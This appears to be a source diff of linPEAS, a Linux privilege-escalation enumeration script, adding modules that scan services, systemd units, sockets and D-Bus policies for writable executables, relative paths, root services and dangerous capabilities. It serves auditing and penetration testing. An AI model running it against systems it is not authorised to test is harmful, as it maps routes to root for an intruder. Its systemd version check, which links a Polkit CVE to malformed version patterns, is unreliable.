        program=$(defaults read "$f" ProgramArguments | grep -Ev "^\(|^\)" | cut -d '"' -f 2)
      fi
      if [ -w "$program" ]; then
        echo "$program" is writable | sed -${E} "s,.*,${SED_RED_YELLOW},";
      fi
    done
    echo ""
    print_2title "StartupItems"
    print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#startup-items"
    ls -l /Library/StartupItems/ /System/Library/StartupItems/ 2>/dev/null
    echo ""
    print_2title "Login Items"
    print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#login-items"
    osascript -e 'tell application "System Events" to get the name of every login item' 2>/dev/null
    echo ""
    print_2title "SPStartupItemDataType"
    system_profiler SPStartupItemDataType
    echo ""
    print_2title "Emond scripts"
    print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#emond"
    ls -l /private/var/db/emondClients
    echo ""
  fi
 fi
 if ! [ "$SEARCH_IN_FOLDER" ]; then
  #-- PCS) Services
  if [ "$EXTRA_CHECKS" ]; then
    print_2title "Services"
    print_info "Search for outdated versions"
    (service --status-all || service -e || chkconfig --list || rc-status || launchctl list) 2>/dev/null || echo_not_found "service|chkconfig|rc-status|launchctl"
    echo ""
  fi
 fi
 if ! [ "$SEARCH_IN_FOLDER" ]; then
  #-- PSC) systemd PATH
  print_2title "Systemd PATH"
  print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#systemd-path-relative-paths"
  systemctl show-environment 2>/dev/null | grep "PATH" | sed -${E} "s,$Wfolders\|\./\|\.:\|:\.,${SED_RED_YELLOW},g"
  WRITABLESYSTEMDPATH=$(systemctl show-environment 2>/dev/null | grep "PATH" | grep -E "$Wfolders")
  echo ""
 fi
 #-- PSC) .service files
 #TODO: .service files in MACOS are folders
 print_2title "Analyzing .service files"
 print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services"
 printf "%s\n" "$PSTORAGE_SYSTEMD" | while read s; do
  if [ ! -O "$s" ] || [ "$SEARCH_IN_FOLDER" ]; then #Remove services that belongs to the current user or if firmware see everything
    if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ] && ! [ "$SEARCH_IN_FOLDER" ]; then
      echo "$s" | sed -${E} "s,.*,${SED_RED_YELLOW},g"
    fi
    servicebinpaths=$(grep -Eo '^Exec.*?=[!@+-]*[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') #Get invoked paths
    printf "%s\n" "$servicebinpaths" | while read sp; do
      if [ -w "$sp" ]; then
        echo "$s is calling this writable executable: $sp" | sed "s,writable.*,${SED_RED_YELLOW},g"
      fi
    done
    relpath1=$(grep -E '^Exec.*=(?:[^/]|-[^/]|\+[^/]|![^/]|!![^/]|)[^/@\+!-].*' "$s" 2>/dev/null | grep -Iv "=/")
    relpath2=$(grep -E '^Exec.*=.*/bin/[a-zA-Z0-9_]*sh ' "$s" 2>/dev/null)
    if [ "$relpath1" ] || [ "$relpath2" ]; then
      if [ "$WRITABLESYSTEMDPATH" ]; then
        echo "$s could be executing some relative path" | sed -${E} "s,.*,${SED_RED},";
      else
        echo "$s could be executing some relative path"
      fi
    fi
  fi
 done
 if [ ! "$WRITABLESYSTEMDPATH" ]; then echo "You can't write on systemd PATH" | sed -${E} "s,.*,${SED_GREEN},"; fi
 echo ""
 if ! [ "$SEARCH_IN_FOLDER" ]; then
  #-- PSC) Timers
  print_2title "System timers"
  print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers"
  (systemctl list-timers --all 2>/dev/null | grep -Ev "(^$|timers listed)" | sed -${E} "s,$timersG,${SED_GREEN},") || echo_not_found
  echo ""
 fi
 #-- PSC) .timer files
 print_2title "Analyzing .timer files"
 print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers"
 printf "%s\n" "$PSTORAGE_TIMER" | while read t; do
  if ! [ "$IAMROOT" ] && [ -w "$t" ] && ! [ "$SEARCH_IN_FOLDER" ]; then
    echo "$t" | sed -${E} "s,.*,${SED_RED},g"
  fi
  timerbinpaths=$(grep -Po '^Unit=*(.*?$)' $t 2>/dev/null | cut -d '=' -f2)
  printf "%s\n" "$timerbinpaths" | while read tb; do
    if [ -w "$tb" ]; then
      echo "$t timer is calling this writable executable: $tb" | sed "s,writable.*,${SED_RED},g"
    fi
  done
  #relpath="`grep -Po '^Unit=[^/].*' \"$t\" 2>/dev/null`"
  #for rp in "$relpath"; do
  #  echo "$t is calling a relative path: $rp" | sed "s,relative.*,${SED_RED},g"
  #done
 done
 echo ""
 #-- PSC) .socket files
 #TODO: .socket files in MACOS are folders
 if ! [ "$IAMROOT" ]; then
  print_2title "Analyzing .socket files"
  print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets"
  printf "%s\n" "$PSTORAGE_SOCKET" | while read s; do
    if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ] && ! [ "$SEARCH_IN_FOLDER" ]; then
      echo "Writable .socket file: $s" | sed "s,/.*,${SED_RED},g"
    fi
    socketsbinpaths=$(grep -Eo '^(Exec).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,')
    printf "%s\n" "$socketsbinpaths" | while read sb; do
      if [ -w "$sb" ]; then
        echo "$s is calling this writable executable: $sb" | sed "s,writable.*,${SED_RED},g"
      fi
    done
    socketslistpaths=$(grep -Eo '^(Listen).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,')
    printf "%s\n" "$socketslistpaths" | while read sl; do
      if [ -w "$sl" ]; then
        echo "$s is calling this writable listener: $sl" | sed "s,writable.*,${SED_RED},g";
      fi
    done
  done
  echo ""
  if ! [ "$SEARCH_IN_FOLDER" ]; then
    print_2title "Unix Sockets Listening"
    print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets"
    # Search sockets using netstat and ss
    unix_scks_list=$(ss -xlp -H state listening 2>/dev/null | grep -Eo "/.* " | cut -d " " -f1)
    if ! [ "$unix_scks_list" ];then
      unix_scks_list=$(ss -l -p -A 'unix' 2>/dev/null | grep -Ei "listen|Proc" | grep -Eo "/[a-zA-Z0-9\._/\-]+")
    fi
    if ! [ "$unix_scks_list" ];then
      unix_scks_list=$(netstat -a -p --unix 2>/dev/null | grep -Ei "listen|PID" | grep -Eo "/[a-zA-Z0-9\._/\-]+" | tail -n +2)
    fi
     unix_scks_list3=$(lsof -U 2>/dev/null | awk '{print $9}' | grep "/") 
  fi
  if ! [ "$SEARCH_IN_FOLDER" ]; then
    # But also search socket files
    unix_scks_list2=$(find / -type s 2>/dev/null)
  else
    unix_scks_list2=$(find "SEARCH_IN_FOLDER" -type s 2>/dev/null)
  fi
  # Detele repeated dockets and check permissions
  (printf "%s\n" "$unix_scks_list" && printf "%s\n" "$unix_scks_list2" && printf "%s\n" "$unix_scks_list3") | sort | uniq | while read l; do
    perms=""
    if [ -r "$l" ]; then
      perms="Read "
    fi
    if [ -w "$l" ];then
      perms="${perms}Write"
    fi
    if [ "$EXTRA_CHECKS" ] && [ "$(command -v curl)" ]; then
      CANNOT_CONNECT_TO_SOCKET="$(curl -v --unix-socket "$l" --max-time 1 http:/linpeas 2>&1 | grep -i 'Permission denied')"
      if ! [ "$CANNOT_CONNECT_TO_SOCKET" ]; then
        perms="${perms} - Can Connect"
      else
        perms="${perms} - Cannot Connect"
      fi
    fi
    if ! [ "$perms" ]; then echo "$l" | sed -${E} "s,$l,${SED_GREEN},g";
    else 
      echo "$l" | sed -${E} "s,$l,${SED_RED},g"
      echo "  └─(${RED}${perms}${NC})" | sed -${E} "s,Cannot Connect,${SED_GREEN},g"
      # Try to contact the socket
      socketcurl=$(curl --max-time 2 --unix-socket "$s" http:/index 2>/dev/null)
      if [ $? -eq 0 ]; then
        owner=$(ls -l "$s" | cut -d ' ' -f 3)
        echo "Socket $s owned by $owner uses HTTP. Response to /index: (limt 30)" | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g"
        echo "$socketcurl" | head -n 30
      fi
    fi
  done
  echo ""
 fi
 #-- PSC) Writable and weak policies in D-Bus config files
 print_2title "D-Bus config files"
 print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus"
 if [ "$PSTORAGE_DBUS" ]; then
  printf "%s\n" "$PSTORAGE_DBUS" | while read d; do
    for f in $d/*; do
      if ! [ "$IAMROOT" ] && [ -w "$f" ] && ! [ "$SEARCH_IN_FOLDER" ]; then
        echo "Writable $f" | sed -${E} "s,.*,${SED_RED},g"
      fi
      genpol=$(grep "<policy>" "$f" 2>/dev/null)
      if [ "$genpol" ]; then printf "Weak general policy found on $f ($genpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi
      #if [ "`grep \"<policy user=\\\"$USER\\\">\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak user policy found on $f () \n" | sed "s,$USER,${SED_RED},g"; fi
      userpol=$(grep "<policy user=" "$f" 2>/dev/null | grep -v "root")
      if [ "$userpol" ]; then printf "Possible weak user policy found on $f ($userpol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi
      #for g in `groups`; do
      #  if [ "`grep \"<policy group=\\\"$g\\\">\" \"$f\" 2>/dev/null`" ]; then printf "Possible weak group ($g) policy found on $f\n" | sed "s,$g,${SED_RED},g"; fi
      #done
      grppol=$(grep "<policy group=" "$f" 2>/dev/null | grep -v "root")
      if [ "$grppol" ]; then printf "Possible weak user policy found on $f ($grppol)\n" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_RED},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$mygroups,${SED_RED},g"; fi
      #TODO: identify allows in context="default"
    done
  done
 fi
 echo ""
 if ! [ "$SEARCH_IN_FOLDER" ]; then
  print_2title "D-Bus Service Objects list"
  print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#d-bus"
  dbuslist=$(busctl list 2>/dev/null)
  if [ "$dbuslist" ]; then
    busctl list | while read line; do
      echo "$line" | sed -${E} "s,$dbuslistG,${SED_GREEN},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED},";
      if ! echo "$line" | grep -qE "$dbuslistG"; then
        srvc_object=$(echo $line | cut -d " " -f1)
        srvc_object_info=$(busctl status "$srvc_object" 2>/dev/null | grep -E "^UID|^EUID|^OwnerUID" | tr '\n' ' ')
        if [ "$srvc_object_info" ]; then
          echo " -- $srvc_object_info" | sed "s,UID=0,${SED_RED},"
        fi
      fi
    done
  else echo_not_found "busctl"
  fi
 fi
--- a/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/10_Services.sh
+++ b/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/10_Services.sh
@ -0,0 +1,193 @@
 # Title: Processes & Cron & Services & Timers - Services and Service Files
 # ID: PR_Services
 # Author: Carlos Polop
 # Last Update: 2024-03-19
 # Description: Services and service files analysis with privilege escalation vectors
 # License: GNU GPL
 # Version: 1.2
 # Functions Used: echo_not_found, print_2title, print_info, print_3title
 # Global Variables: $EXTRA_CHECKS, $SEARCH_IN_FOLDER, $IAMROOT, $WRITABLESYSTEMDPATH
 # Initial Functions:
 # Generated Global Variables: $service_unit, $service_path, $service_content, $finding, $findings, $service_file, $exec_path, $exec_paths, $service, $line, $target_file, $target_exec, $relpath1, $relpath2
 # Fat linpeas: 0
 # Small linpeas: 0
 if ! [ "$SEARCH_IN_FOLDER" ]; then
  print_2title "Services and Service Files"
  print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#services"
  # Function to check service content for privilege escalation vectors
  check_service_content() {
    local service="$1"
    local findings=""
    # Check if service runs with elevated privileges
    if systemctl show "$service" -p User 2>/dev/null | grep -q "root"; then
      findings="${findings}RUNS_AS_ROOT: Service runs as root\n"
    fi
    # Get the executable path and check it
    local exec_path=$(systemctl show "$service" -p ExecStart 2>/dev/null | cut -d= -f2 | cut -d' ' -f1)
    if [ -n "$exec_path" ]; then
      if [ -w "$exec_path" ]; then
        findings="${findings}WRITABLE_EXEC: Executable is writable: $exec_path\n"
      fi
      # Check for relative paths
      #case "$exec_path" in
      #  /*) : ;; # Absolute path, do nothing
      #  *) findings="${findings}RELATIVE_PATH: Uses relative path: $exec_path\n" ;;
      #esac
      # Check for weak permissions
      if [ -e "$exec_path" ] && [ "$(stat -c %a "$exec_path" 2>/dev/null)" = "777" ]; then
        findings="${findings}WEAK_PERMS: Executable has 777 permissions\n"
      fi
    fi
    # Check for unsafe configurations
    if systemctl show "$service" -p ExecStart 2>/dev/null | grep -qE '(chmod|chown|mount|sudo|su)'; then
      findings="${findings}UNSAFE_CMD: Uses potentially dangerous commands\n"
    fi
    # Check for environment variables with sensitive data
    if systemctl show "$service" -p Environment 2>/dev/null | grep -qE '(PASS|SECRET|KEY|TOKEN|CRED)'; then
      findings="${findings}SENSITIVE_ENV: Contains sensitive environment variables\n"
    fi
    # Check for capabilities
    if systemctl show "$service" -p CapabilityBoundingSet 2>/dev/null | grep -qE '(CAP_SYS_ADMIN|CAP_DAC_OVERRIDE|CAP_DAC_READ_SEARCH)'; then
      findings="${findings}DANGEROUS_CAPS: Has dangerous capabilities\n"
    fi
    # If any findings, print them
    if [ -n "$findings" ]; then
      echo "  Potential issue in service: $service"
      echo "$findings" | while read -r finding; do
        [ -n "$finding" ] && echo "  └─ $finding"
      done
    fi
  }
  # Function to check service file for privilege escalation vectors
  check_service_file() {
    local service_file="$1"
    local findings=""
    # Check if service file is writable (following symlinks)
    if [ -L "$service_file" ]; then
      # If it's a symlink, check the target file
      local target_file=$(readlink -f "$service_file")
      if ! [ "$IAMROOT" ] && [ -w "$target_file" ] && [ -f "$target_file" ] && ! [ "$SEARCH_IN_FOLDER" ]; then
        findings="${findings}WRITABLE_FILE: Service target file is writable: $target_file\n"
      fi
    elif ! [ "$IAMROOT" ] && [ -w "$service_file" ] && [ -f "$service_file" ] && ! [ "$SEARCH_IN_FOLDER" ]; then
      findings="${findings}WRITABLE_FILE: Service file is writable\n"
    fi
    # Check for weak permissions (following symlinks)
    if [ "$(stat -L -c %a "$service_file" 2>/dev/null)" = "777" ]; then
      findings="${findings}WEAK_PERMS: Service file has 777 permissions\n"
    fi
    # Check for relative paths in Exec directives - Original logic
    local relpath1=$(grep -E '^Exec.*=(?:[^/]|-[^/]|\+[^/]|![^/]|!![^/]|)[^/@\+!-].*' "$service_file" 2>/dev/null | grep -Iv "=/")
    local relpath2=$(grep -E '^Exec.*=.*/bin/[a-zA-Z0-9_]*sh ' "$service_file" 2>/dev/null)
    if [ "$relpath1" ] || [ "$relpath2" ]; then
      if [ "$WRITABLESYSTEMDPATH" ]; then
        findings="${findings}RELATIVE_PATH: Could be executing some relative path (systemd path is writable)\n"
      else
        findings="${findings}RELATIVE_PATH: Could be executing some relative path\n"
      fi
    fi
    # Check for writable executables (following symlinks)
    local exec_paths=$(grep -Eo '^Exec.*?=[!@+-]*[a-zA-Z0-9_/\-]+' "$service_file" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,')
    printf "%s\n" "$exec_paths" | while read -r exec_path; do
      if [ -n "$exec_path" ]; then
        if [ -L "$exec_path" ]; then
          local target_exec=$(readlink -f "$exec_path")
          if [ -w "$target_exec" ]; then
            findings="${findings}WRITABLE_EXEC: Executable target is writable: $target_exec\n"
          fi
        elif [ -w "$exec_path" ]; then
          findings="${findings}WRITABLE_EXEC: Executable is writable: $exec_path\n"
        fi
      fi
    done
    # If any findings, print them
    if [ -n "$findings" ]; then
      echo "  Potential issue in service file: $service_file"
      echo "$findings" | while read -r finding; do
        [ -n "$finding" ] && echo "  └─ $finding"
      done
    fi
  }
  # List all services and check for privilege escalation vectors
  echo ""
  print_3title "Active services:"
  systemctl list-units --type=service --state=active 2>/dev/null | grep -v "UNIT" | while read -r line; do
    service_unit=$(echo "$line" | awk '{print $1}')
    if [ -n "$service_unit" ]; then
      # Print the service line with highlighting
      echo "$line" | sed -${E} "s,$service_unit,${SED_GREEN},"
      # Get service file path
      service_path=$(systemctl show "$service_unit" -p FragmentPath 2>/dev/null | cut -d= -f2)
      if [ -n "$service_path" ]; then
        check_service_file "$service_path"
      fi
      # Check service content for privilege escalation vectors
      check_service_content "$service_unit"
    fi
  done || echo_not_found
  # Check for disabled but available services
  echo ""
  print_3title "Disabled services:"
  systemctl list-unit-files --type=service --state=disabled 2>/dev/null | grep -v "UNIT FILE" | while read -r line; do
    service_unit=$(echo "$line" | awk '{print $1}')
    if [ -n "$service_unit" ]; then
      # Print the service line with highlighting
      echo "$line" | sed -${E} "s,$service_unit,${SED_GREEN},"
      # Get service file path
      service_path=$(systemctl show "$service_unit" -p FragmentPath 2>/dev/null | cut -d= -f2)
      if [ -n "$service_path" ]; then
        check_service_file "$service_path"
      fi
      # Check service content for privilege escalation vectors
      check_service_content "$service_unit"
    fi
  done || echo_not_found
  # Check service files from PSTORAGE_SYSTEMD
  if [ -n "$PSTORAGE_SYSTEMD" ]; then
    echo ""
    print_3title "Additional service files:"
    printf "%s\n" "$PSTORAGE_SYSTEMD" | while read -r service_file; do
      if [ -n "$service_file" ] && [ -e "$service_file" ]; then
        check_service_file "$service_file"
      fi
    done
  fi
  # Check for outdated services if EXTRA_CHECKS is enabled
  if [ "$EXTRA_CHECKS" ]; then
    echo ""
    print_3title "Service versions and status:"
    (service --status-all || service -e || chkconfig --list || rc-status || launchctl list) 2>/dev/null || echo_not_found "service|chkconfig|rc-status|launchctl"
  fi
  # Check systemd path writability
  if [ ! "$WRITABLESYSTEMDPATH" ]; then 
    echo "You can't write on systemd PATH" | sed -${E} "s,.*,${SED_GREEN},"
  else
    echo "You can write on systemd PATH" | sed -${E} "s,.*,${SED_RED},"
    echo "If a relative path is used, it's possible to abuse it."
  fi
  echo ""
 fi
--- a/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/11_Systemd.sh
+++ b/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/11_Systemd.sh
@ -0,0 +1,156 @@
 # Title: System Information - Systemd
 # ID: SY_Systemd
 # Author: Carlos Polop
 # Last Update: 2024-03-19
 # Description: Check for systemd vulnerabilities and misconfigurations that could lead to privilege escalation:
 #   - Systemd version vulnerabilities (CVE-2021-4034, CVE-2021-33910, etc.)
 #   - Services running as root that could be exploited
 #   - Services with dangerous capabilities that could be abused
 #   - Services with writable paths that could be used to inject malicious code
 #   - Exploitation methods:
 #     * Version exploits: Use known exploits for vulnerable systemd versions
 #     * Root services: Abuse services running as root to execute commands
 #     * Capabilities: Abuse services with dangerous capabilities (CAP_SYS_ADMIN, etc.)
 #     * Writable paths: Replace executables in writable paths to get code execution
 # License: GNU GPL
 # Version: 1.1
 # Functions Used: print_2title, print_list, echo_not_found
 # Global Variables: $SEARCH_IN_FOLDER, $Wfolders, $SED_RED, $SED_RED_YELLOW, $NC
 # Initial Functions:
 # Generated Global Variables: $WRITABLESYSTEMDPATH, $line, $service, $file, $version, $user, $caps, $path, $path_line, $service_file, $exec_line, $cmd
 # Fat linpeas: 0
 # Small linpeas: 1
 if ! [ "$SEARCH_IN_FOLDER" ]; then
    print_2title "Systemd Information"
    print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#systemd-path---relative-paths"
    # Function to check if systemctl is available
    check_systemctl() {
        if ! command -v systemctl >/dev/null 2>&1; then
            echo_not_found "systemctl"
            return 1
        fi
        return 0
    }
    # Function to get service file path
    get_service_file() {
        local service="$1"
        local file=""
        for path in "/etc/systemd/system/$service" "/lib/systemd/system/$service"; do
            if [ -f "$path" ]; then
                file="$path"
                break
            fi
        done
        echo "$file"
    }
    # Function to check dangerous capabilities
    check_dangerous_caps() {
        local caps="$1"
        echo "$caps" | grep -qE '(CAP_SYS_ADMIN|CAP_DAC_OVERRIDE|CAP_DAC_READ_SEARCH|CAP_SETUID|CAP_SETGID|CAP_NET_ADMIN)'
        return $?
    }
    # Check systemd version and known vulnerabilities
    print_list "Systemd version and vulnerabilities? .............. "$NC
    if check_systemctl; then
        version=$(systemctl --version | head -n 1 | grep -oE '([0-9]+(\.[0-9]+)+)')
        if [ -n "$version" ]; then
            echo "$version" | sed -${E} "s,([0-9]+(\.[0-9]+)+),${SED_RED},g"
            # Check for known vulnerable versions
            case "$version" in
                "2.3"[0-4]|"2.3"[0-4]"."*)
                    echo "  └─ Vulnerable to CVE-2021-4034 (Polkit)" | sed -${E} "s,.*,${SED_RED},g"
                    ;;
                "2.4"[0-9]|"2.4"[0-9]"."*)
                    echo "  └─ Vulnerable to CVE-2021-33910 (systemd-tmpfiles)" | sed -${E} "s,.*,${SED_RED},g"
                    ;;
            esac
        fi
    fi
    # Check for systemd services running as root
    print_list "Services running as root? ..... "$NC
    if check_systemctl; then
        systemctl list-units --type=service --state=running 2>/dev/null | 
        grep -E "root|0:0" | 
        while read -r line; do
            service=$(echo "$line" | awk '{print $1}')
            user=$(systemctl show "$service" -p User 2>/dev/null | cut -d= -f2)
            echo "$service (User: $user)" | sed -${E} "s,root|0:0,${SED_RED},g"
        done
        echo ""
    else
        echo ""
    fi
    # Check for systemd services with dangerous capabilities
    print_list "Running services with dangerous capabilities? ... "$NC
    if check_systemctl; then
        systemctl list-units --type=service --state=running 2>/dev/null | 
        grep -E "\.service" | 
        while read -r line; do
            service=$(echo "$line" | awk '{print $1}')
            caps=$(systemctl show "$service" -p CapabilityBoundingSet 2>/dev/null | cut -d= -f2)
            if [ -n "$caps" ] && check_dangerous_caps "$caps"; then
                echo "$service: $caps" | sed -${E} "s,.*,${SED_RED},g"
            fi
        done
        echo ""
    else
        echo ""
    fi
    # Check for systemd services with writable paths
    print_list "Services with writable paths? . "$NC
    if check_systemctl; then
        systemctl list-units --type=service --state=running 2>/dev/null | 
        grep -E "\.service" | 
        while read -r line; do
            service=$(echo "$line" | awk '{print $1}')
            service_file=$(get_service_file "$service")
            if [ -n "$service_file" ]; then
                # Check ExecStart paths
                grep -E "ExecStart|ExecStartPre|ExecStartPost" "$service_file" 2>/dev/null | 
                while read -r exec_line; do
                    # Extract the first word after ExecStart* as the command
                    cmd=$(echo "$exec_line" | awk '{print $2}' | tr -d '"')
                    # Extract the rest as arguments
                    args=$(echo "$exec_line" | awk '{$1=$2=""; print $0}' | tr -d '"')
                    # Only check the command path, not arguments
                    if [ -n "$cmd" ] && [ -w "$cmd" ]; then
                        echo "$service: $cmd (from $exec_line)" | sed -${E} "s,.*,${SED_RED},g"
                    fi
                    # Check for relative paths only in the command, not arguments
                    if [ -n "$cmd" ] && [ "${cmd#/}" = "$cmd" ] && ! echo "$cmd" | grep -qE '^-|^--'; then
                        echo "$service: Uses relative path '$cmd' (from $exec_line)" | sed -${E} "s,.*,${SED_RED},g"
                    fi
                done
            fi
        done
    else
        echo ""
    fi
    echo ""
    print_2title "Systemd PATH"
    print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#systemd-path---relative-paths"
    if check_systemctl; then
        systemctl show-environment 2>/dev/null | 
        grep "PATH" | 
        while read -r path_line; do
            echo "$path_line" | sed -${E} "s,$Wfolders\|\./\|\.:\|:\.,${SED_RED_YELLOW},g"
            # Store writable paths for later use
            if echo "$path_line" | grep -qE "$Wfolders"; then
                WRITABLESYSTEMDPATH="$path_line"
            fi
        done
    fi
    echo ""
 fi
--- a/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/12_Socket_files.sh
+++ b/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/12_Socket_files.sh
@ -0,0 +1,146 @@
 # Title: Processes & Cron & Services & Timers - Socket Files Analysis
 # ID: PR_Socket_files
 # Author: Carlos Polop
 # Last Update: 2024-03-19
 # Description: Analyze .socket files for privilege escalation vectors:
 #   - Writable socket files
 #   - Socket files executing writable binaries
 #   - Socket files with writable listeners
 #   - Socket files with relative paths
 #   - Socket files with unsafe configurations
 # License: GNU GPL
 # Version: 1.2
 # Functions Used: print_2title, print_info, print_list
 # Global Variables: $IAMROOT, $SEARCH_IN_FOLDER, $SED_RED, $SED_RED_YELLOW, $NC
 # Initial Functions:
 # Generated Global Variables: $exec_path, $listen_path, $path, $exec_paths, $finding, $listen_paths, $socket_file, $findings, $target_file, $target_listen, $target_exec, $lpath
 # Fat linpeas: 0
 # Small linpeas: 0
 if ! [ "$IAMROOT" ]; then
    print_2title "Analyzing .socket files"
    print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sockets"
    # Function to check if path is relative
    is_relative_path() {
        local lpath="$1"
        case "$lpath" in
            /*) return 1 ;; # Absolute path
            *) return 0 ;;  # Relative path
        esac
    }
    # Function to check socket file content
    check_socket_file() {
        local socket_file="$1"
        local findings=""
        # Check if socket file is writable (following symlinks)
        if [ -L "$socket_file" ]; then
            # If it's a symlink, check the target file
            local target_file=$(readlink -f "$socket_file")
            if ! [ "$IAMROOT" ] && [ -w "$target_file" ] && [ -f "$target_file" ] && ! [ "$SEARCH_IN_FOLDER" ]; then
                findings="${findings}WRITABLE_FILE: Socket target file is writable: $target_file\n"
            fi
        elif ! [ "$IAMROOT" ] && [ -w "$socket_file" ] && [ -f "$socket_file" ] && ! [ "$SEARCH_IN_FOLDER" ]; then
            findings="${findings}WRITABLE_FILE: Socket file is writable\n"
        fi
        # Check for weak permissions (following symlinks)
        if [ "$(stat -L -c %a "$socket_file" 2>/dev/null)" = "777" ]; then
            findings="${findings}WEAK_PERMS: Socket file has 777 permissions\n"
        fi
        # Check for executables (following symlinks)
        local exec_paths=$(grep -Eo '^(Exec).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$socket_file" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,')
        printf "%s\n" "$exec_paths" | while read -r exec_path; do
            if [ -n "$exec_path" ]; then
                # Check if executable is writable (following symlinks)
                if [ -L "$exec_path" ]; then
                    local target_exec=$(readlink -f "$exec_path")
                    if [ -w "$target_exec" ]; then
                        findings="${findings}WRITABLE_EXEC: Executable target is writable: $target_exec\n"
                    fi
                    # Check for weak permissions on target
                    if [ -e "$target_exec" ] && [ "$(stat -L -c %a "$target_exec" 2>/dev/null)" = "777" ]; then
                        findings="${findings}WEAK_EXEC_PERMS: Executable target has 777 permissions: $target_exec\n"
                    fi
                else
                    if [ -w "$exec_path" ]; then
                        findings="${findings}WRITABLE_EXEC: Executable is writable: $exec_path\n"
                    fi
                    # Check for weak permissions
                    if [ -e "$exec_path" ] && [ "$(stat -L -c %a "$exec_path" 2>/dev/null)" = "777" ]; then
                        findings="${findings}WEAK_EXEC_PERMS: Executable has 777 permissions: $exec_path\n"
                    fi
                fi
                # Check for relative paths
                if is_relative_path "$exec_path"; then
                    findings="${findings}RELATIVE_PATH: Uses relative path: $exec_path\n"
                fi
            fi
        done
        # Check for listeners (following symlinks)
        local listen_paths=$(grep -Eo '^(Listen).*?=[!@+-]*/[a-zA-Z0-9_/\-]+' "$socket_file" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,')
        printf "%s\n" "$listen_paths" | while read -r listen_path; do
            if [ -n "$listen_path" ]; then
                # Check if listener path is writable (following symlinks)
                if [ -L "$listen_path" ]; then
                    local target_listen=$(readlink -f "$listen_path")
                    if [ -w "$target_listen" ]; then
                        findings="${findings}WRITABLE_LISTENER: Listener target path is writable: $target_listen\n"
                    fi
                    # Check for weak permissions on target
                    if [ -e "$target_listen" ] && [ "$(stat -L -c %a "$target_listen" 2>/dev/null)" = "777" ]; then
                        findings="${findings}WEAK_LISTENER_PERMS: Listener target path has 777 permissions: $target_listen\n"
                    fi
                else
                    if [ -w "$listen_path" ]; then
                        findings="${findings}WRITABLE_LISTENER: Listener path is writable: $listen_path\n"
                    fi
                    # Check for weak permissions
                    if [ -e "$listen_path" ] && [ "$(stat -L -c %a "$listen_path" 2>/dev/null)" = "777" ]; then
                        findings="${findings}WEAK_LISTENER_PERMS: Listener path has 777 permissions: $listen_path\n"
                    fi
                fi
                # Check for relative paths
                if is_relative_path "$listen_path"; then
                    findings="${findings}RELATIVE_LISTENER: Uses relative path: $listen_path\n"
                fi
            fi
        done
        # Check for unsafe configurations
        if grep -qE '^(User|Group)=root' "$socket_file" 2>/dev/null; then
            findings="${findings}ROOT_USER: Socket runs as root\n"
        fi
        if grep -qE '^(CapabilityBoundingSet).*CAP_SYS_ADMIN' "$socket_file" 2>/dev/null; then
            findings="${findings}DANGEROUS_CAPS: Has dangerous capabilities\n"
        fi
        if grep -qE '^(BindIP|BindIPv6Only)=yes' "$socket_file" 2>/dev/null; then
